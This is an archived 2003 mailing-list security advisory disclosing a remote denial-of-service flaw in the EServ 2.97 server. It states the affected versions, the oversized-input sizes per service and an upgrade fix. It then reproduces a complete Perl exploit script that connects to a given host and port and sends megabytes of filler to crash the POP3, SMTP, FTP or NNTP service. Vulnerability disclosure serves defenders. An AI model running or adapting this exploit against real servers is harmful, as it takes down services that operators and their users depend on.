[VulnWatch] EServ/2.97 remote DoS

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

  • Next message: D4rkGr3y: "[VulnWatch] AN HTTPd v.1.41e: DoS, CSS, real patch attack"
    Date: Sat, 4 Jan 2003 05:01:41 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: EServ/2.97
    #Authors: Etype Co. [www.eserv.ru]
    #Vulnerable versions: up to v.2.97, may be 2.98
    #Not vulnerable versions: v.2.99
    #Vulnerability: remote DoS
    #####################################################*

    #Overview#--------------------------------------------------------------#
    From EServ's 'readme' file:
    "Eserv/2.97 - mail, news, web, ftp and proxy server.
    It includes:

    - SMTP, POP3, NNTP -servers
    - caching HTTP/FTP proxy
    - HTTP server (maintaining virtual servers)
    - FTP server (with download and upload resuming support)
    - FTP-gate
    - Socks5, Socks4 and 4a proxy
    - TCP UDP mapping proxy
    - Finger-server"

    #Problem#---------------------------------------------------------------#
    We founded 4 bugs, that allows to kill EServ by sending data with a
    very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b,
    NNTP - 5001216b. This is not buffer overflow, so it's impossible to use
    this bugs for privelege escalation or something like this.

    #Fix#--------------------------------------------------------------------#
    Download new verion from www.eserv.ru. EServ/2.99 _is_not_vulnerable_.

    #Exploit#----------------------------------------------------------------#

    #!/usr/bin/perl
    ######################################################
    #EServ/2.97 remote DoS xsploit
    #Bugs founded in v.2.97 but I think that 2.98 is
    #vulnerable too.
    #################
    #Usage: perl EServ.DoS.pl [host] [port] [service_type]
    #Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
    #Example: perl EServ.DoS.pl localhost 110 pop
    #################
    #If something wrong or u wanna to discuss something,
    #contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
    #######################################################
    use IO::Socket;
    $host = $ARGV[0];
    $port = $ARGV[1];
    $param = $ARGV[2];
    $data = "a";
    print "\n\n";;
    print "#Product: EServ/2.97 - www.eserv.ru\n";
    print "#Vuln: remote DoS\n";
    print "#Xsploit by D4rkGr3y\n";
    print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
    if ($param) {
    $num = "4950001" if $param eq "pop";
    $num = "4960000" if $param eq "smtp";
    $num = "5005312" if $param eq "ftp";
    $num = "5001215" if $param eq "nntp";
    die "Error in params\n" if !$num;
    print "Connecting...";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket
    error.\n";
    print "OK\n";
    $buf .= $data x $num;
    print "Attacking...";
    print $socket "$buf\n";
    print "OK\n\n";
    print "Vizit us at www.dhgroup.org";
    close($socket);
    } else {
      print "Error in Params.\n";
      print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
      print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
      print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
      exit;
    }

    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981



    Relevant Pages

    • EServ/2.97 remote DoS
      ... #Vulnerability: remote DoS ... "Eserv/2.97 - mail, news, web, ftp and proxy server. ... this bugs for privelege escalation or something like this. ...
      (Bugtraq)
    • Re: Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability
      ... Vulnerability (remote DoS in the reported way) confirmed: ... Normally all of the three topics have to be considered, when the server is installed as an remotely accessible server. ... Older versions may be vulnerable under the same condition (installation as a desktop application) but a number of indpendent solutions are available: ...
      (Bugtraq)
    • SecurityFocus Microsoft Newsletter #142
      ... MICROSOFT VULNERABILITY SUMMARY ... Mollensoft Enceladus Server Suite Clear Text Password Storage... ... FakeBO Syslog Format String Vulnerability ... Methodus 3 Web Server File Disclosure Vulnerability ...
      (Focus-Microsoft)
    • SecurityFocus Microsoft Newsletter #139
      ... OFF any Windows 2000 Managed Dedicated Hosting Solution from Interland. ... Sun ONE Application Server Plaintext Password Vulnerability ... Batalla Naval Remote Buffer Overflow Vulnerability ...
      (Focus-Microsoft)
    • SecurityFocus Microsoft Newsletter #140
      ... Cafelog b2 Remote File Include Vulnerability ... Webfroot Shoutbox Remote Command Execution Vulnerability ... Pablo Software Solutions Baby POP3 Server Multiple Connection... ... Microsoft Windows XP Nested Directory Denial of Service... ...
      (Focus-Microsoft)